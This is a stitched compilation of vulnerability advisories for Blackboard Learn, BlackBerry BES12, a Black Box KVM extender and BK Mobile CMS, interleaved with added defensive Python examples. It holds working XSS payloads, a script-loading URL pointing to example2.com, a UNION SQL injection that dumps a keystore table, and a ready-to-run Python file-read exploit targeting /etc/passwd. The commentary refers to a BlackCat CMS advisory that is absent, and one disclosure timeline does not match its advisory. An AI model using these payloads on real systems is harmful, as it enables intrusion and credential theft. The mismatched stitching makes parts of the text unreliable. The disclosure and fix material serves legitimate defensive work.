Cookie: JSESSIONID=285EAF6ED95FF4574CADF4FF90F218B1; __utma=154552106.1787260759.1470597563.1470597563.1470652392.2;
__utmz=154552106.1470597563.1.1.utmcsr=vulnlab.coursesites.com|utmccn=(referral)|utmcmd=referral|utmcct=/; COOKIE_CONSENT_ACCEPTED=true;
NSC_106969_wjq_69.196.229.208.hspvq=ffffffff090d159545525d5f4f58455e445a4a42378b; session_id=153E1080C32EF7E9393910EC45598887;
s_session_id=FCCF148598E6531BC4167D5C3B8A2949; JSESSIONID=C866524B3CA437DF8E0AC184746DBD36; __utmb=154552106.26.9.1470653164713; __utmc=154552106; __utmt=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 605
userVO.firstName=%3Cimg+src%3Dx+onerror%3Dprompt%284%29%3E&userVO.lastName=%3Cimg+src%3Dx+onerror%3Dprompt%284%29%3E&userVO.user.educationLevel=
Not+Disclosed&userVO.user.gender=Not+Disclosed&birthDate_datetime=&pickdate=&pickname=&birthDate_date=&userVO.user.studentId=&userType=HE_STUDENT
&userVO.user.emailAddress=sec%40secteach.me&userVO.user.street1=&userVO.user.city=&userVO.user.state=&userVO.user.zipCode=&userVO.user.country=AF
&userVO.user.mobilePhone=&userVO.user.homePhone1=&userVO.user.webPage=&userVO.userProfile.institutionGuid=User_Instr_2015-02-22_19%3A31%3A21.304
&userVO.user.jobTitle=&userVO.user.department=&top_Submit=Submit
-
RESPONSE
HTTP/1.1 200 OK
Date: Mon, 08 Aug 2016 11:06:31 GMT
Server: Apache/1.3.42 (Unix) mod_ssl/2.8.31 OpenSSL/1.0.1g mod_jk/1.2.37
X-Blackboard-appserver: fgprd-106969-156642-app006.mhint
P3P: CP="CAO PSA OUR"
X-Blackboard-product: Blackboard Learn ™ 9.1.140152.0
Set-Cookie: session_id=153E1080C32EF7E9393910EC45598887; Path=/; HttpOnly
Set-Cookie: s_session_id=FCCF148598E6531BC4167D5C3B8A2949; Path=/; Secure; HttpOnly
Pragma: no-cache
Cache-Control: no-cache, no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Last-Modified: Fri, 18 Jul 2014 19:02:32 GMT
Content-Language: en-US
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html;charset=UTF-8
Reference(s):
https://b-lms.localhost:8000/
https://b-lms.localhost:8000/webapps/
https://b-lms.localhost:8000/webapps/Bb-sites-user-profile-BBLEARN/
https://b-lms.localhost:8000/webapps/Bb-sites-user-profile-BBLEARN/profile.form
Solution - Fix & Patch:
=======================
The vulnerability can be patched by securely parsing or encoding the vulnerable firstname and lastname input fields.
Disallow the usage of special chars and filter the entries by escaping them. Encode the output context in profile.form to
prevent application-side execution.
Security Risk:
==============
The security risk of the application-side input validation vulnerabilities in the user profile section is estimated as medium. (CVSS 4.2)
Credits & Authors:
==================
Vulnerability Lab [Research Team] - Lawrence Amer (http://www.vulnerability-lab.com/show.php?user=Lawrence%20Amer)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied,
including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage,
including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised
of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing
limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically
redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or
its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific
authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to ask for permission.
Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
source: https://www.securityfocus.com/bid/48009/info
Blackboard Learn is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Blackboard Learn 8.0 is vulnerable; other versions may also be affected.
http://www.example.com/bin/common/search.pl?action=RESULTS&context=USERDIR&type=SEARCH&operation=VIEW&keyword=abcd&keywordraw=%22abcd%22/%3E%3Cscript+src%3Dhttp://www.example2.com/js/alert.js%3E%3C/script%3E%3Ca+href%3D%22test%22%3Ewhat%3C/a&x=26&y=15&by=user_id
( , ) (,
. '.' ) ('. ',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
BlackBerry Enterprise Service 12 (BES12) Self-Service
Affected versions: BES12 < 12.4
CVE: CVE-2016-1914 and CVE-2016-1915
PDF:
http://security-assessment.com/files/documents/advisory/Blackberry%20BES12%20Self-Service%20Multiple%20Vulnerabilities.pdf
+-----------+
|Description|
+-----------+
Blackberry BES12 is an enterprise mobile management solution and
contains a self-service web application available to mobile users. This
web application contains multiple vulnerabilities including unauthenticated SQL
injection and reflected cross site scripting.
Limited access to an on-premise BES12 environment was provided during
the discovery of these vulnerabilities. The full impact of the
vulnerabilities in relation to compromising other portions of the BES12
solution, such as mobile devices, is unclear.
+------------+
|Exploitation|
+------------+
*SQL Injection*
The Java servlet com.rim.mdm.ui.server.ImageServlet is vulnerable to SQL
injection via the imageName parameter. This servlet is exposed at
multiple paths and is used to fetch an image from the database:
/mydevice/client/image
/admin/client/image
/myapps/client/image
/ssam/client/image
/all/client/image
This was discovered on a production BES12 on-premise deployment and the
injection vector allowed both UNION and stacked queries to be executed
on the Microsoft SQL server used by BES12. This allows full read/write
access to the database, and can potentially result in command execution
via xp_cmdshell depending on the database user configuration.
The following proof of concept demonstrates an injection payload which
will select the entire obj_keystore_entry table. The query will
serialise the entire table into an XML document which is returned in the
HTTP response as UTF-16 without the leading BOM (byte order mark)
causing most text editors to fail to display the response correctly.
https://<server>/mydevice/client/image?imageName=ui.cobranded.login.logo'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,(SELECT+*+FROM+obj_keystore_entry+FOR+XML+PATH(''))+--
The technique above can be used to download any database table available
to the BES12 database user.
Notable database tables are:
* obj_user which contains BES12 user details.
* obj_user_authentication which contains authentication tokens.
* obj_user_device which based on column names, contains enrolment
tokens, enrolment secrets and device encryption keys.
It is unclear if this information is sufficient to decrypt a lost/stolen
BES12 mobile device.
*Reflected Cross Site Scripting*
Two areas of the self-service web application exist where user-supplied
input is reflected directly in web pages, allowing a malicious user to
conduct Cross Site Scripting (XSS) attacks against users of the
application. While the application uses the HttpOnly cookie flag for
session tokens, successful exploitation allows malicious JavaScript to
perform any action within the application that the targeted user is able
to. The administrative web application is typically hosted on the same
domain and may be attacked using these XSS vectors, although this is
BES12 deployment specific.
The table below details where Cross Site Scripting was detected and
which parameters are vulnerable:
https://<server>/mydevice/index.jsp?locale="><script>alert(1)</script>
https://<server>/mydevice/loggedOut.jsp?locale="><script>alert(1)</script>
+----------+
| Solution |
+----------+
Upgrade to BES12.4.
+-------------------+
|Disclosure Timeline|
+-------------------+
Initial disclosure to Blackberry – 19 Nov 2015
Disclosure receipt confirmed by Blackberry – 19 Nov 2015
Request for update from Blackberry – 7 Dec 2015
Vulnerabilities confirmed by Blackberry – 8 Dec 2015
Blackberry confirms fixes will be released as part of BES12.4 – 28 Jan 2016
BES12.4 released – 29 Jan 2016
Advisory released – 15 Feb 2016
+-----------------------------+
|About Security-Assessment.com|
+-----------------------------+
Security-Assessment.com is a leading team of Information Security
consultants specialising in providing high quality Information Security
services to clients throughout the Asia Pacific region. Our clients
include some of the largest globally recognised companies in areas such
as finance, telecommunications, broadcasting, legal and government. Our
aim is to provide the very best independent advice and a high level of
technical expertise while creating long and lasting professional
relationships with our clients.
Security-Assessment.com is committed to security research and
development, and its team continues to identify and responsibly publish
vulnerabilities in public and private software vendor's products.
Members of the Security-Assessment.com R&D team are globally recognised
through their release of whitepapers and presentations related to new
security research.
For further information on this issue or any of our service offerings,
contact us:
Web www.security-assessment.com
Email info@security-assessment.com
# Exploit Title: Black Box Kvm Extender 3.4.31307 - Local File Inclusion
# Date: 05.07.2021
# Exploit Author: Ferhat Çil
# Vendor Homepage: http://www.blackbox.com/
# Software Link: https://www.blackbox.com/en-us/products/black-box-brand-products/kvm
# Version: 3.4.31307
# Category: Webapps
# Tested on: Linux
# Description: Any user can read files from the server
# without authentication due to an existing LFI in the following path:
# http://target//cgi-bin/show?page=FilePath
import requests
import sys

if __name__ == '__main__':
    if len(sys.argv) == 3:
        url = sys.argv[1]
        payload = url + "/cgi-bin/show?page=../../../../../../" + sys.argv[2]
        r = requests.get(payload)
        print(r.text)
    else:
        print("Usage: " + sys.argv[0] + ' http://example.com/ /etc/passwd')
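Both this LFI and the BlackCat CMS 1.1.1 `logs.php?dl=` download above come from joining a user-supplied name onto a base directory without checking where the result ends up. As an added example (not the vendors' code, and in Python rather than PHP or CGI), `resolve_under` canonicalises the joined path and refuses anything that leaves the base directory, while `resolve_page` shows the stricter alternative for a `page=` parameter: the application already knows every page it can show, so the name is looked up in a table and never used as a path. The directory names and the page table are constructed.

```python
import os
from typing import Dict, Optional


def resolve_under(base_dir: str, requested: str) -> Optional[str]:
    """Return the absolute path of `requested` inside `base_dir`, or None when
    the request is empty, absolute, contains a NUL byte, or resolves (after
    `..` and symlink normalisation) to anywhere outside base_dir."""
    if not requested or "\x00" in requested or os.path.isabs(requested):
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    try:
        # commonpath avoids the "/srv/temp" vs "/srv/temp2" prefix mistake
        if os.path.commonpath([base, candidate]) != base:
            return None
    except ValueError:  # paths on different drives (Windows)
        return None
    return candidate


# Constructed page table for a `show?page=` style parameter.
PAGE_TABLE: Dict[str, str] = {"status": "status.html", "network": "network.html"}


def resolve_page(base_dir: str, page_name: str) -> Optional[str]:
    """Allowlist lookup: unknown names get None, known names map to a fixed file."""
    filename = PAGE_TABLE.get(page_name)
    if filename is None:
        return None
    return os.path.join(os.path.realpath(base_dir), filename)


if __name__ == "__main__":
    for req in ("export.log", "../config.php", "../../../../../../etc/passwd", "/etc/passwd"):
        print("%-32s -> %s" % (req, resolve_under("/srv/blackcat/temp", req)))
    print(resolve_page("/srv/www/pages", "status"), resolve_page("/srv/www/pages", "../../etc/passwd"))
```

On the web-server side, the same request pattern is easy to alert on: a `page=` or `dl=` value containing `../` in the access log has no legitimate origin.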
#Product : BK Mobile CMS
#Exploit Author : Rahul Pratap Singh
#Version : 2.4
#Home page Link : http://codecanyon.net/item/jquery-mobile-website-with-full-admin-panel/2441358
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 27/Jan/2016
SQLi Vulnerability:
----------------------------------------
Description:
----------------------------------------
"g_name" parameter is not sanitized that leads to SQL Injection.
----------------------------------------
Vulnerable Code:
----------------------------------------
file: gallery1.php
line 5
$get_g_name = $_GET['g_name'];
$query_photos = "SELECT * FROM ".$get_prefix."photos WHERE
gallery_name='".$get_g_name."' ORDER BY id DESC";
----------------------------------------
Exploit:
----------------------------------------
http://localhost/BKMobile%20CMS/user/gallery1.php?g_name=1%27%20union%20all%20select%201,2,3,group_concat%28version%28%29%29,5--+
----------------------------------------
POC:
----------------------------------------
https://0x62626262.files.wordpress.com/2016/01/bk-mobile-templatesqlipoc.png
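The vulnerable line in gallery1.php and the BES12 ImageServlet `imageName` injection above share one defect: the parameter is spliced into the SQL text. The following added example (not BK Mobile's or BlackBerry's code) reproduces that pattern beside its parameterised fix against a constructed in-memory SQLite database, so the difference can be observed on a UNION payload of the shape used in the advisory: the concatenated query returns rows from a table it was never meant to touch, the bound-parameter query returns nothing. Table and column names are constructed; the same fix in Java is a `PreparedStatement` with `?` placeholders, and in PHP a PDO prepared statement.

```python
import sqlite3
from typing import List, Tuple


def setup_demo_db() -> sqlite3.Connection:
    """Constructed stand-in for the CMS database: the photos table gallery1.php
    reads, plus a users table that an injection would try to reach."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE cms_photos (id INTEGER PRIMARY KEY, gallery_name TEXT, file TEXT)")
    conn.executemany(
        "INSERT INTO cms_photos (gallery_name, file) VALUES (?, ?)",
        [("holiday", "beach.jpg"), ("holiday", "sunset.jpg"), ("private", "secret.jpg")],
    )
    conn.execute("CREATE TABLE cms_users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)")
    conn.execute("INSERT INTO cms_users (username, password_hash) VALUES ('admin', 'hash-placeholder')")
    return conn


def photos_vulnerable(conn: sqlite3.Connection, g_name: str) -> List[Tuple]:
    """The pattern from gallery1.php line 5: the parameter becomes part of the SQL text,
    so quotes, UNION and comment markers in it change the statement's structure."""
    query = ("SELECT id, gallery_name, file FROM cms_photos WHERE gallery_name='"
             + g_name + "' ORDER BY id DESC")
    return conn.execute(query).fetchall()


def photos_parameterized(conn: sqlite3.Connection, g_name: str) -> List[Tuple]:
    """Fix: the statement is compiled once with a placeholder and the value is
    bound afterwards, so it can only ever be compared as data."""
    query = "SELECT id, gallery_name, file FROM cms_photos WHERE gallery_name=? ORDER BY id DESC"
    return conn.execute(query, (g_name,)).fetchall()


def leaks_user_rows(rows: List[Tuple]) -> bool:
    """True when a photo query result contains a row that came from cms_users."""
    return any(row[1] == "admin" for row in rows)


if __name__ == "__main__":
    db = setup_demo_db()
    payload = "1' union all select id,username,password_hash from cms_users--"
    print("concatenated:", photos_vulnerable(db, payload))
    print("parameterized:", photos_parameterized(db, payload))
```

Parameter binding is the fix; input filtering is at best a detection signal (a gallery name containing `union`, `'` or `--` is worth logging), and the database account the application uses should be limited to the tables it needs so that an injection elsewhere cannot reach credential tables at all.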
XSS Vulnerability:
----------------------------------------
Description:
----------------------------------------
"g_name" parameter is not sanitized that leads to reflected XSS.
----------------------------------------
Vulnerable Code:
----------------------------------------
file: gallery1.php
line 81-88
<div data-role="page" id="<?php echo $get_g_name; ?>" class="jqm-demos"
<?php echo $custom_bg_active; ?>>
<?php include("../header.php"); ?>
<div role="main" class="ui-content">
<div class="jqm-block-content">
<h3><?php echo $_GET['g_name']; ?></h3>
----------------------------------------
Exploit:
----------------------------------------
http://localhost/BKMobile%20CMS/user/gallery1.php?g_name=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E
----------------------------------------
POC:
----------------------------------------
https://0x62626262.files.wordpress.com/2016/01/bk-mobile-templatexsspoc.png
Fix:
Update to 2.5
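The XSS in gallery1.php puts `g_name` into two different HTML contexts (an `id` attribute and an `<h3>` body), and the Blackboard, BlackCat and BES12 cross-site scripting issues earlier on this page are the same class of bug in name, group-name, display-name and `locale` fields. As an added example (not any of these vendors' code, and in Python rather than PHP or JSP), the following encodes per output context and shows that the payloads quoted in those advisories come out inert; `flag_suspicious_name` is a detection aid for logging markup-like input in fields where it never belongs, not a substitute for encoding. The rendering templates are constructed.

```python
import html
import re


def encode_html_body(value: str) -> str:
    """For text between tags: < > & " ' become entities."""
    return html.escape(value, quote=True)


def encode_html_attr(value: str) -> str:
    """For a double-quoted attribute value. The template must always emit the
    surrounding quotes; an unquoted attribute cannot be made safe by escaping."""
    return html.escape(value, quote=True)


def encode_js_string(value: str) -> str:
    """For a quoted JavaScript string literal: everything outside [A-Za-z0-9]
    becomes \\xHH or \\uHHHH, so the value can close neither the literal nor
    the enclosing <script> element."""
    out = []
    for ch in value:
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        elif ord(ch) < 256:
            out.append("\\x%02x" % ord(ch))
        else:
            out.append("\\u%04x" % ord(ch))
    return "".join(out)


def render_profile(first_name: str, last_name: str) -> str:
    """Constructed profile fragment: the name lands in an attribute and in body text."""
    return ('<div class="profile" data-name="%s"><span>%s %s</span></div>'
            % (encode_html_attr(first_name), encode_html_body(first_name), encode_html_body(last_name)))


def render_gallery(g_name: str) -> str:
    """Constructed counterpart of gallery1.php lines 81-88: id attribute plus <h3> body."""
    return ('<div data-role="page" id="%s" class="jqm-demos"><h3>%s</h3></div>'
            % (encode_html_attr(g_name), encode_html_body(g_name)))


_SUSPICIOUS = re.compile(r"<\s*/?[a-z]|\bon[a-z]+\s*=|javascript\s*:", re.IGNORECASE)


def flag_suspicious_name(value: str) -> bool:
    """Detection only: True when a name-type field carries tag-like or event-handler text."""
    return bool(_SUSPICIOUS.search(value))


if __name__ == "__main__":
    print(render_profile('<img src=x onerror=prompt(4)>', 'Doe'))
    print(render_gallery('<script>alert("XSS")</script>'))
    print(flag_suspicious_name('" onmouseover=alert(1) "'))
```

A `Content-Security-Policy` that disallows inline script gives a second, independent layer for the case where an encoder is forgotten in one template.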
Vulnerability Disclosure Timeline:
→ January 14, 2015 – Bug discovered, initial report to Vendor
→ January 14, 2015 – Vendor acknowledged
→ January 19, 2015 – Vendor Deployed a Patch
#######################################
# CTG SECURITY SOLUTIONS #
# www.ctgsecuritysolutions.com #
#######################################
Pub Ref:
https://0x62626262.wordpress.com/2016/01/27/bk-mobile-cms-sqli-and-xss-vulnerability
http://codecanyon.net/item/jquery-mobile-website-with-full-admin-panel/2441358
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.